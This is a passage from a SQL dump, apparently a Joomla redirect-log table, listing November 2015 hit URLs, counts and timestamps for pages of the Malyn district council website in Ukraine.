00:00:00',301),(19538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=683:------------------------2012-&catid=42&Itemid=80&lang=uk','','','',2,0,'2015-11-23 09:50:48','0000-00-00 00:00:00',301),(19539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=701:-2011-2017-&catid=43&Itemid=82&lang=uk','','','',3,0,'2015-11-23 09:50:48','0000-00-00 00:00:00',301),(19540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=702:--------------------2011-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-11-23 09:50:49','0000-00-00 00:00:00',301),(19541,'http://www.malyn-rayrada.org.ua/index.php/650-pro-sklikannja-25-pozachergovoi-sesii-rajonnoi','','','',10,0,'2015-11-23 09:51:16','0000-00-00 00:00:00',301),(19542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=794:-lr&catid=45&Itemid=84&lang=uk','','','',2,0,'2015-11-23 09:51:18','0000-00-00 00:00:00',301),(19543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=797:-6-16112010-5-&catid=45&Itemid=84&lang=uk','','','',2,0,'2015-11-23 09:51:19','0000-00-00 00:00:00',301),(19544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45:--14112012-&Itemid=84&lang=uk','','','',6,0,'2015-11-23 09:51:46','0000-00-00 00:00:00',301),(19545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&Itemid=14&lang=en','','','',2,0,'2015-11-23 09:51:48','0000-00-00 00:00:00',301),(19546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=53&Itemid=94&lang=en&limitstart=5','','','',2,0,'2015-11-23 09:51:48','0000-00-00 00:00:00',301),(19547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2015-11-23 09:51:58','0000-00-00 00:00:00',301),(19548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=479:2011-11-28-07-33-14&catid=38&Itemid=73&lang=uk','','','',12,0,'2015-11-23 09:52:23','0000-00-00 00:00:00',301),(19549,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/472-pro-zatverdzhennja-programi-zajnjatosti-naselennja_2','','','',15,0,'2015-11-23 09:52:28','0000-00-00 00:00:00',301),(19550,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',5,0,'2015-11-23 09:52:28','0000-00-00 00:00:00',301),(19551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=562:-19122011194-30122011202&catid=39&Itemid=76&lang=uk','','','',2,0,'2015-11-23 09:52:32','0000-00-00 00:00:00',301),(19552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2015-11-23 10:28:19','0000-00-00 00:00:00',301),(19553,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/332-pro-hid-vikonannja-rajonnoi-programi_5?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 10:30:44','0000-00-00 00:00:00',301),(19554,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/348-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_8','','','',2,0,'2015-11-23 10:31:03','0000-00-00 00:00:00',301),(19555,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25072012-/349-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_12?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 10:31:13','0000-00-00 00:00:00',301),(19556,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/306-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_3','','','',5,0,'2015-11-23 10:33:18','0000-00-00 00:00:00',301),(19557,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/306-pro-rozgljad-protestu-prokurora-malinskogo-rajonu_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:21','0000-00-00 00:00:00',301),(19558,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--27042012-/307-pro-pogodzhennja-otrimannja-specialnogo-dozvolu-na?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:28','0000-00-00 00:00:00',301),(19559,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/153-pro-rozgljad-protestu-prokurora-malinskogo-rajonu','','','',5,0,'2015-11-23 10:33:30','0000-00-00 00:00:00',301),(19560,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/153-pro-rozgljad-protestu-prokurora-malinskogo-rajonu?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:32','0000-00-00 00:00:00',301),(19561,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/221-pro-zvit-kerivnika-komunalnogo-pidpriemstva','','','',5,0,'2015-11-23 10:33:35','0000-00-00 00:00:00',301),(19562,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/221-pro-zvit-kerivnika-komunalnogo-pidpriemstva?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:37','0000-00-00 00:00:00',301),(19563,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/235-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_3','','','',5,0,'2015-11-23 10:33:40','0000-00-00 00:00:00',301),(19564,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/235-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2012_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:42','0000-00-00 00:00:00',301),(19565,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/236-pro-utvorennja-deputatskoi-grupi-ridna-malinshhina','','','',6,0,'2015-11-23 10:33:44','0000-00-00 00:00:00',301),(19566,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/236-pro-utvorennja-deputatskoi-grupi-ridna-malinshhina?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:33:47','0000-00-00 00:00:00',301),(19567,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/272-pro-zatverdzhennja-porjadku-vikoristannja-koshtiv','','','',2,0,'2015-11-23 10:34:04','0000-00-00 00:00:00',301),(19568,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/272-pro-zatverdzhennja-porjadku-vikoristannja-koshtiv?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 10:34:06','0000-00-00 00:00:00',301),(19569,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/273-pro-ne-zaperechennja-shhodo-nadannja-v_2','','','',2,0,'2015-11-23 10:34:08','0000-00-00 00:00:00',301),(19570,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/273-pro-ne-zaperechennja-shhodo-nadannja-v_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 10:34:12','0000-00-00 00:00:00',301),(19571,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/274-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_2','','','',2,0,'2015-11-23 10:34:14','0000-00-00 00:00:00',301),(19572,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/274-pro-vnesennja-zmin-do-rishennja-rajonnoi-radi-vid_2?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 10:34:16','0000-00-00 00:00:00',301),(19573,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/283-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi','','','',6,0,'2015-11-23 10:34:22','0000-00-00 00:00:00',301),(19574,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/283-pro-zvernennja-deputativ-malinskoi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:34:24','0000-00-00 00:00:00',301),(19575,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/661-pro-priznachennja-direktora-komunalnogo','','','',6,0,'2015-11-23 10:34:53','0000-00-00 00:00:00',301),(19576,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/661-pro-priznachennja-direktora-komunalnogo?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:34:55','0000-00-00 00:00:00',301),(19577,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:34:58','0000-00-00 00:00:00',301),(19578,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/667-pro-nadannja-prava-malinskij-rajonnij-radi','','','',5,0,'2015-11-23 10:35:00','0000-00-00 00:00:00',301),(19579,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/667-pro-nadannja-prava-malinskij-rajonnij-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:02','0000-00-00 00:00:00',301),(19580,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/668-pro-zatverdzhennja-rozporjadzhennja-golovi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:06','0000-00-00 00:00:00',301),(19581,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/669-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2013_4?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:10','0000-00-00 00:00:00',301),(19582,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/793-pro-zvernennja-do-malinskoi-miskoi-radi','','','',5,0,'2015-11-23 10:35:23','0000-00-00 00:00:00',301),(19583,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/793-pro-zvernennja-do-malinskoi-miskoi-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:24','0000-00-00 00:00:00',301),(19584,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/795-pro-zvernennja-do-malinskoi-miskoi-radi_2','','','',5,0,'2015-11-23 10:35:26','0000-00-00 00:00:00',301),(19585,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/795-pro-zvernennja-do-malinskoi-miskoi-radi_2?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:28','0000-00-00 00:00:00',301),(19586,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/493-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_3','','','',6,0,'2015-11-23 10:35:46','0000-00-00 00:00:00',301),(19587,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/493-pro-vnesennja-zmin-do-rishennja-i-sesii-rajonnoi_3?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:48','0000-00-00 00:00:00',301),(19588,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/494-pro-vnesennja-zmin-u-dodatok-do-rishennja-rajonnoi','','','',6,0,'2015-11-23 10:35:50','0000-00-00 00:00:00',301),(19589,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/494-pro-vnesennja-zmin-u-dodatok-do-rishennja-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:52','0000-00-00 00:00:00',301),(19590,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/495-pro-docilnist-perebuvannja-na-posadi-nachalnika','','','',8,0,'2015-11-23 10:35:56','0000-00-00 00:00:00',301),(19591,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/495-pro-docilnist-perebuvannja-na-posadi-nachalnika?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:35:58','0000-00-00 00:00:00',301),(19592,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/496-pro-zvernennja-do-direktora-departamentu-finansiv','','','',6,0,'2015-11-23 10:35:59','0000-00-00 00:00:00',301),(19593,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/496-pro-zvernennja-do-direktora-departamentu-finansiv?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 10:36:01','0000-00-00 00:00:00',301),(19594,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?limitstart=0','','','',10,0,'2015-11-23 10:36:19','0000-00-00 00:00:00',301),(19595,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-?start=14','','','',10,0,'2015-11-23 10:36:22','0000-00-00 00:00:00',301),(19596,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-pro-h','','','',2,0,'2015-11-23 10:36:24','0000-00-00 00:00:00',301),(19597,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/69-rishennya-vid-26-11-2014-roku','','','',5,0,'2015-11-23 10:37:02','0000-00-00 00:00:00',301),(19598,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?limitstart=0','','','',18,0,'2015-11-23 10:56:49','0000-00-00 00:00:00',301),(19599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=50:--23042013-&layout=blog&Itemid=90&lang=ru','','','',2,0,'2015-11-23 10:56:59','0000-00-00 00:00:00',301),(19600,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42&Itemid=80&lang=en','','','',2,0,'2015-11-23 11:10:43','0000-00-00 00:00:00',301),(19609,'http://www.malyn-rayrada.org.ua/index.php?option=com_firmy','','','',1,0,'2015-11-23 11:17:56','0000-00-00 00:00:00',301),(19610,'http://www.malyn-rayrada.org.ua/index.php?option=com_x-shop','','','',1,0,'2015-11-23 11:17:58','0000-00-00 00:00:00',301),(19611,'http://www.malyn-rayrada.org.ua/index.php?option=com_tag','','','',1,0,'2015-11-23 11:17:58','0000-00-00 00:00:00',301),(19612,'http://www.malyn-rayrada.org.ua/index.php/1013-vidpovid-na-zvernennya-deputativ-rajonnoji-radi','','','',19,0,'2015-11-23 11:52:25','0000-00-00 00:00:00',301),(19613,'http://www.malyn-rayrada.org.ua/index.php/17-na-malinshhini-svjato-ostannogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-23 11:52:37','0000-00-00 00:00:00',301),(19614,'http://www.malyn-rayrada.org.ua/index.php/454-vitaemo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 11:53:43','0000-00-00 00:00:00',301),(19615,'http://www.malyn-rayrada.org.ua/index.php/502-informacija-pro-provedennja-aukcionu-gazeta?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-23 11:53:44','0000-00-00 00:00:00',301),(19616,'http://www.malyn-rayrada.org.ua/index.php/568-ogoloshennja_5?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-23 11:53:57','0000-00-00 00:00:00',301),(19617,'http://www.malyn-rayrada.org.ua/index.php/704-malinskij-rajon-iz-bjudzhetom-na-2014-rik','','','',9,0,'2015-11-23 11:54:05','0000-00-00 00:00:00',301),(19618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42:--16052012-&Itemid=80&lang=en','','','',3,0,'2015-11-23 12:01:21','0000-00-00 00:00:00',301),(19619,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=676:2012-05-17-09-52-12&catid=42:--16052012-&Itemid=80&lang=en','','','',2,0,'2015-11-23 12:15:12','0000-00-00 00:00:00',301),(19620,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/515-pro-zatverdzhenja-aktu-prijomu-peredachi','','','',7,0,'2015-11-23 12:39:14','0000-00-00 00:00:00',301),(19621,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/131-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2011_2','','','',2,0,'2015-11-23 12:47:44','0000-00-00 00:00:00',301),(19622,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=676:2012-05-17-09-52-12&lang=ru&option=com_content&view=article','','','',3,0,'2015-11-23 14:21:57','0000-00-00 00:00:00',301),(19623,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46&layout=blog&Itemid=85&lang=ru&limitstart=15','','','',2,0,'2015-11-23 14:36:00','0000-00-00 00:00:00',301),(19624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=44&layout=blog&Itemid=83&lang=ru','','','',1,0,'2015-11-23 14:49:13','0000-00-00 00:00:00',301),(19625,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/4-pro-zatverdzhennja-kompleksnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-23 14:55:38','0000-00-00 00:00:00',301),(19626,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/12-','','','',1,0,'2015-11-23 14:55:41','0000-00-00 00:00:00',301),(19627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=46&Itemid=85&lang=ru&limitstart=15','','','',3,0,'2015-11-23 14:57:15','0000-00-00 00:00:00',301),(19628,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=44&Itemid=83&lang=ru','','','',5,0,'2015-11-23 15:02:50','0000-00-00 00:00:00',301),(19629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=ru&limitstart=15','','','',5,0,'2015-11-23 15:12:46','0000-00-00 00:00:00',301),(19630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=44:--12092012-&layout=blog&Itemid=83&lang=ru','','','',3,0,'2015-11-23 15:21:46','0000-00-00 00:00:00',301),(19631,'http://malyn-rayrada.org.ua/index.php/724-verhovna-rada-ukraini-prijnjala-postanovu-pro','','','',6,0,'2015-11-23 18:36:14','0000-00-00 00:00:00',301),(19632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=546:-l-r-&catid=39:-22022012-&Itemid=76&lang=ru','','','',2,0,'2015-11-23 19:06:20','0000-00-00 00:00:00',301),(19633,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=828:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2015-11-23 20:06:16','0000-00-00 00:00:00',301),(19634,'http://www.malyn-rayrada.org.ua/index.php/1113-pomer-kulchitskij-josip-lyudvigovich-pochesnij-gromadyanin-malina?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-23 21:11:58','0000-00-00 00:00:00',301),(19635,'http://www.malyn-rayrada.org.ua/index.php?id=57&Itemid=98&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-23 21:27:51','0000-00-00 00:00:00',301),(19636,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=632:-2011-2015-&Itemid=80&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-23 21:27:58','0000-00-00 00:00:00',301),(19637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=582:2012-02-27-13-18-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-11-23 21:35:16','0000-00-00 00:00:00',301),(19638,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=463:-2007-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2015-11-23 21:54:18','0000-00-00 00:00:00',301),(19639,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1153-novovorobjivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-23 22:45:35','0000-00-00 00:00:00',301),(19640,'http://www.malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-23 23:03:00','0000-00-00 00:00:00',301),(19641,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=936:2013-02-21-09-43-43&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-23 23:21:08','0000-00-00 00:00:00',301),(19643,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1154-vladivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-24 01:16:57','0000-00-00 00:00:00',301),(19644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=52&layout=blog&Itemid=93&lang=en','','','',1,0,'2015-11-24 01:26:55','0000-00-00 00:00:00',301),(19645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=52&Itemid=93&lang=en','','','',4,0,'2015-11-24 01:48:12','0000-00-00 00:00:00',301),(19646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=52&layout=blog&Itemid=93&lang=en','','','',1,0,'2015-11-24 02:18:26','0000-00-00 00:00:00',301),(19648,'http://www.malyn-rayrada.org.ua/index.php/463-sogodni-pravoslavni-hristijani-vidznachajut-verbnu?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-24 03:16:26','0000-00-00 00:00:00',301),(19653,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/911-pro-zatverdzhennya-novogo-skladu-komisiji-rajonnoji-radi-z-pitan-ponovlennya-prav-reabilitovanikh','','','',31,0,'2015-11-24 06:10:28','0000-00-00 00:00:00',301),(19654,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1048-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',19,0,'2015-11-24 06:10:57','0000-00-00 00:00:00',301),(19655,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/173-pro-hid-vikonannja-rajonnoi-programi-prizovna','','','',18,0,'2015-11-24 06:40:07','0000-00-00 00:00:00',301),(19656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=47:-21022013-&layout=blog&Itemid=86&lang=ru','','','',4,0,'2015-11-24 06:41:33','0000-00-00 00:00:00',301),(19657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=843:-l-r&catid=46:--21122012&Itemid=85&lang=ru','','','',1,0,'2015-11-24 06:46:48','0000-00-00 00:00:00',301),(19658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29&Itemid=60&lang=ru','','','',11,0,'2015-11-24 06:47:17','0000-00-00 00:00:00',301),(19659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=824:-2012-&catid=45:--14112012-&Itemid=84&lang=en','','','',3,0,'2015-11-24 06:47:46','0000-00-00 00:00:00',301),(19660,'http://www.malyn-rayrada.org.ua/index.php/259-vidznacheno-deputata-malinskoi-rajonnoi-radi','','','',42,0,'2015-11-24 06:48:07','0000-00-00 00:00:00',301),(19661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=125:---q-2010q&catid=11&Itemid=16&lang=en','','','',2,0,'2015-11-24 06:48:43','0000-00-00 00:00:00',301),(19662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=734:-6-2012-&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-11-24 06:49:12','0000-00-00 00:00:00',301),(19663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=662:-lr-&catid=11&Itemid=14&lang=uk','','','',3,0,'2015-11-24 06:51:06','0000-00-00 00:00:00',301),(19664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=42:--16052012-&layout=blog&Itemid=80&lang=en&limitstart=20','','','',1,0,'2015-11-24 06:51:35','0000-00-00 00:00:00',301),(19665,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=438:-----------l--r&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-24 06:52:52','0000-00-00 00:00:00',301),(19666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42&Itemid=80&lang=ru','','','',1,0,'2015-11-24 06:53:01','0000-00-00 00:00:00',301),(19667,'http://www.malyn-rayrada.org.ua/index.php/--03022014-/693-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_15','','','',4,0,'2015-11-24 06:53:58','0000-00-00 00:00:00',301),(19668,'http://www.malyn-rayrada.org.ua/index.php/--29112013-/666-pro-zvernennja-shhodo-zabezpechennja-socialnih','','','',1,0,'2015-11-24 06:54:27','0000-00-00 00:00:00',301),(19669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=46:--21122012&layout=blog&Itemid=85&lang=en&limitstart=10','','','',3,0,'2015-11-24 06:55:25','0000-00-00 00:00:00',301),(19670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43&Itemid=82&lang=en','','','',3,0,'2015-11-24 06:55:54','0000-00-00 00:00:00',301),(19671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=490:2011-12-02-09-02-47&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-11-24 06:56:51','0000-00-00 00:00:00',301),(19672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=40&layout=blog&Itemid=77&lang=uk','','','',1,0,'2015-11-24 07:23:37','0000-00-00 00:00:00',301),(19673,'http://www.malyn-rayrada.org.ua/index.php/1034-vitaemo-iz-svyatom-vesni?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-24 10:52:58','0000-00-00 00:00:00',301),(19674,'http://www.malyn-rayrada.org.ua/index.php/1212-viddil-statistiki-u-malinskomu-rajoni-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-24 11:07:25','0000-00-00 00:00:00',301),(19675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=76&lang=ru&limitstart=10','','','',1,0,'2015-11-24 11:17:18','0000-00-00 00:00:00',301),(19676,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39&layout=blog&Itemid=76&lang=ru&limitstart=10','','','',1,0,'2015-11-24 11:39:07','0000-00-00 00:00:00',301),(19677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=ru&limitstart=5','','','',1,0,'2015-11-24 11:59:28','0000-00-00 00:00:00',301),(19678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=39:-22022012-&layout=blog&Itemid=76&lang=ru&limitstart=10','','','',2,0,'2015-11-24 12:15:23','0000-00-00 00:00:00',301),(19679,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=560:2012-02-02-08-56-53&lang=uk&option=com_content&view=article','','','',4,0,'2015-11-24 13:15:42','0000-00-00 00:00:00',301),(19680,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43&Itemid=82&lang=en','','','',2,0,'2015-11-24 13:53:31','0000-00-00 00:00:00',301),(19681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43:--25072012-&Itemid=82&lang=en','','','',2,0,'2015-11-24 14:33:34','0000-00-00 00:00:00',301),(19682,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=927:2013-02-21-09-06-04&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-24 14:34:47','0000-00-00 00:00:00',301),(19683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43:--25072012-&Itemid=82&lang=en','','','',1,0,'2015-11-24 15:22:50','0000-00-00 00:00:00',301),(19684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2015-11-24 15:45:52','0000-00-00 00:00:00',301),(19689,'http://www.malyn-rayrada.org.ua/index.php?id=52&Itemid=93&lang=en&layout=blog&option=com_content&view=category','','','',3,0,'2015-11-24 20:53:15','0000-00-00 00:00:00',301),(19690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=5:-----5-&catid=5&Itemid=6&lang=ru','','','',15,0,'2015-11-24 20:57:40','0000-00-00 00:00:00',301),(19691,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=452:-20-2011-100-l-r-&Itemid=73&lang=ru&option=com_content&view=article','','','',19,0,'2015-11-24 